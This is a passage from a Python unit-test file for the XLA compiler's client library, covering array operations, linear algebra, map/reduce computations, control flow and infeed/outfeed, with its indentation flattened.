_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
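    # Each (edge_padding_low, edge_padding_high, interior_padding) triple below
    # pads one dimension of the 2x2 operand.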
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
    self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
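    # l is lower triangular with a positive diagonal, so the Cholesky
    # factorization of l.dot(l.T) should recover l itself.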
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
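    # With left_side=False and transpose_a=True this should solve
    # np.dot(x, a_vals.T) == b_vals for x, where a_vals is lower triangular.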
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
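    # Starting at 1.0 and doubling while the value is < 10 gives
    # 1 -> 2 -> 4 -> 8 -> 16.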
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
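    # Execution blocks until the infeed is fed and the outfeed is drained, so
    # run it on a worker thread while this thread performs the transfers.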
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
